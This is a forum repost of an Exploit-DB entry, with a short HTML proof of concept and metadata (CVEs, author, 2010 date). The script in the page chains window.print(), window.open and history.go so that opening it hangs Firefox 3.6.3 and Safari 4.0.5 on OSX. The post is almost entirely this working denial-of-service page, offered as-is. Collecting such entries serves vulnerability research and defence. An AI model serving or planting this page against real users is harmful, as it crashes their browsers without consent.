Exploit Multiple Browsers - 'window.print()' Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12509
Проверка EDB
  1. Пройдено
Автор
DR_IDE
Тип уязвимости
DOS
Платформа
OSX
CVE
cve-2009-3270 cve-2008-7246 cve-2008-7245 cve-2008-7244
Дата публикации
2010-05-04
HTML:
<--
Firefox 3.6.3 window.print() DoS version 2
Found By:   Dr_IDE
Credits:    Asheesh kumar Mani Tripathi
Reference:  http://www.exploit-db.com/exploits/11432
Tested On:  Firefox 3.6.3 on OSX 10.6.3; Safari 4.0.5 on OSX 10.6.3
Tested On:
-->

<html>
<title>Dr_IDE Firefox 3.6.3 & Safari 4.0.5 window.print() DoS</title>
<script>
function test(){
window.onerror=new Function(history.go(window.open(window.print())));
}

test();
</script>
</html>
 
Источник
www.exploit-db.com

Похожие темы